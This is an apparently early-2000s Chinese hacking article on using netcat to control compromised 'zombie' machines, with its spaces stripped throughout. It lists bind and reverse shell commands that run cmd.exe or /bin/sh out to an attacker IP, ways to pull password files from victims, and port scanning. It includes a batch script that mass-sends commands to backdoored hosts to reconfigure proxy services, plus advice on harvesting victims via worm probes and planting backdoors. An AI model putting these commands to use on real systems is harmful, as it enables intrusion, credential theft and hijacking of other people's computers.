nc.exe高级技巧应用汇总
文章作者:zhoutree
0.写在前面的话
1.Netcat1.10forNT-nc11nt.zip,原始英文信息
2.Netcat1.10forNT帮助信息
3.Netcat1.10常用的命令格式
4.管理肉鸡,更改肉鸡设置
5.下载连接
6.后记
######################################################################
0.写在前面的话
######################################################################
最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。
自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,
但是借助于金山词霸2002版本,还是明白了一点东西.
我觉的有必要再总结一下.反正主要是满足我自己的需要.
######################################################################
1.Netcat1.10forNT-nc11nt.zip
######################################################################
BasicFeatures
*Outboundorinboundconnections,TCPorUDP,toorfromanyports
*FullDNSforward/reversechecking,withappropriatewarnings
*Abilitytouseanylocalsourceport
*Abilitytouseanylocally-configurednetworksourceaddress
*Built-inport-scanningcapabilities,withrandomizer
*Canreadcommandlineargumentsfromstandardinputb
*Slow-sendmode,onelineeveryNseconds
*Hexdumpoftransmittedandreceiveddata
*Abilitytoletanotherprogramserviceestablished
connections
*Telnet-optionsresponder
NewforNT
*Abilitytoruninthebackgroundwithoutaconsolewindow
*Abilitytorestartasasingle-threadedservertohandleanew
connection
________________________________________________________________________
Someofthefeaturesofnetcatare:
Outboundorinboundconnections,TCPorUDP,toorfromanyports
FullDNSforward/reversechecking,withappropriatewarnings
Abilitytouseanylocalsourceport
Abilitytouseanylocally-configurednetworksourceaddress
Built-inport-scanningcapabilities,withrandomizer
Built-inloosesource-routingcapability
Canreadcommandlineargumentsfromstandardinput
Slow-sendmode,onelineeveryNseconds
Optionalabilitytoletanotherprogramserviceinboundconnections
Someofthepotentialusesofnetcat:
Scriptbackends
Scanningportsandinventoryingservices
Backuphandlers
Filetransfers
Servertestingandsimulation
Firewalltesting
Proxygatewaying
Networkperformancetesting
Addressspoofingtests
ProtectingXservers
1001otherusesyou`lllikelycomeupwith
Netcat+Encryption=Cryptcat
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1NC.EXE是一个非标准的telnet客户端程序,
1.2还有一个putty.exe客户端程序,提供四种连接模式
-raw-telnet-rlogin-ssh.
######################################################################
2.Netcat1.10forNT帮助信息
######################################################################
C:WINDOWSDesktop>nc-h
[v1.10NT]
connecttosomewhere:nc[-options]hostnameport[s][ports]...
listenforinbound:nc-l-pport[options][hostname][port]
options:
-ddetachfromconsole,backgroundmode(后台模式)
-eproginboundprogramtoexec[dangerous!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-hthiscruft(本帮助信息)
-isecsdelayintervalforlinessent,portsscanned(延迟时间)
-llistenmode,forinboundconnects(监听模式,等待连接)
-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)
-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)
-ofilehexdumpoftraffic(十六进制模式输出文件,三段)
-pportlocalportnumber(本地端口)
-rrandomizelocalandremoteports(随机本地远程端口)
-saddrlocalsourceaddress(本地源地址)
-tanswerTELNETnegotiation
-uUDPmode
-vverbose[usetwicetobemoreverbose](-vv更多信息)
-wsecstimeoutforconnectsandfinalnetreads
-zzero-I/Omode[usedforscanning](扫描模式,-vv)
portnumberscanbeindividualorranges:m-n[inclusive]
######################################################################
3.Netcat1.10常用的命令格式
######################################################################
下面引用《沉睡不醒10月15日凌晨》的文章的部分。
3.1.端口的刺探:
nc-vvipport
RIVER[192.168.0.198]19190(?)open//显示是否开放open
3.2.扫描器
nc-vv-w5ipport-portport
nc-vv-zipport-portport
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3.后门
victimmachine://受害者的机器
nc-l-pport-ecmd.exe//win2000
nc-l-pport-e/bin/sh//unix,linux
attackermachine://攻击者的机器.
ncip-pport//连接victim_IP,然后得到一个shell。
3.4.反向连接
attackermachine://一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc-vv-l-pport
victimmachine:
nc-ecmd.exeattackerip-pport
nc-e/bin/shattackerip-pport
或者:
attackermachine:
nc-vv-l-pport1/*用于输入*/
nc-vv-l-pprot2/*用于显示*/
victimmachine:
ncattacker_ipport1|cmd.exe|ncattacker_ipport2
ncattacker_ipport1|/bin/sh|ncattacker_ipport2
139要加参数-s(nc.exe-L-p139-d-ecmd.exe-s对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。
3.5.传送文件:
3.5.1attackermachine<--victimmachine//从肉鸡拖密码文件回来.
nc-d-l-pport<pathfiledest/*attackermachine*/可以shell执行
nc-vvattacker_ipport>pathfile.txt/*victimmachine*/需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
3.5.2attackermachine-->victimmachine//上传命令文件到肉鸡
nc-vv-l-pport>pathfile.txt/*victimmachine*/需要Ctrl+C退出
nc-dvictim_ipport<pathfiledest/*attackermachine*/可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论:可以传输ascii,bin文件.可以传输程序文件.
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe.
或者只有再次连接使用pskill.exe杀掉进程.但是是否释放传输文件打开的句柄了?
3.6端口数据抓包.
nc-vv-w2-otest.txtwww.xfocus.net8021-15
<000000583530302053796e746178206572726f72#500Syntaxerror
<000000682c20636f6d6d616e6420222220756e72#,command""unr
<0000007865636f676e697a65642e0d0a#ecognized...
<00000084830000018f#.....
3.7telnet,自动批处理。★★★★★我要重点推荐的东西就是这个.
ncvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.
nc-vvvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.
nc-dvictim_ipport<pathfile.cmd安静模式.
_______________file.cmd________________________
password
cd%windir%
echo[]=[%windir%]
c:
cd
mdtest
cd/d%windir%system32
netstopsksockserver
snake.exe-configport11111
netstartsksockserver
exit
_______________file.cmd__END___________________
######################################################################
4.管理肉鸡,更改肉鸡设置
######################################################################
4.1比如要统一更改肉鸡上面的代理端口.snake.exe修改为11111服务名称"sksockserver"
使用winshell后门.端口1234密码password
命令格式就是
modi.batyouip.txt
___________modi.bat____________________________
@if"%1"==""echoError:noip.txt&&gotoEND
:start
@echopassword>a.cmd
@echos>>a.cmd
@echocd/d%%windir%%system32>>a.cmd
@netstop"sksockserver">>a.cmd
@snake.exe-configport11111>>a.cmd
@netstart"sksockserver">>a.cmd
@exit>>a.cmd
:auto
@for/f"eol=;tokens=1,2"%%iin(%1)do@(nc.exe-vv-w3%%i1234<a.cmd)
:END
___________modi.bat__END_______________________
4.2
@echooff
colorf0
:start
cls
C:nc-vv-w3-l-p80>>80.txt
gotostart
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.
但是也是一种便宜的办法.
肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞
自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器
######################################################################
5.下载连接
######################################################################
5.1http://www.atstake.com/research/tools/network_utilities/
Tool:Netcat1.10forUnix
Version:03.20.96
Platforms:*nix
Tool:Netcat1.1forWin95/98/NT/2000
Version:02.08.98
Platforms:RunsonWin95/98/NT/2000
5.2http://www.xfocus.net/download.php?id=320
名称:cryptcat_nt.zip更新时间:2002-04-05
类别:网络工具平台:Win9x/NT/2000大小:115.8K提交:maxilaw
简介:加密传输的nc。
5.3http://content.443.ch/pub/security/blackhat/Networking/nc/国外的网站
10.03.0215:481305cryptcat.txt
10.03.0215:48245760cryptcat_linux2.tar
10.03.0215:48118533cryptcat_nt.zip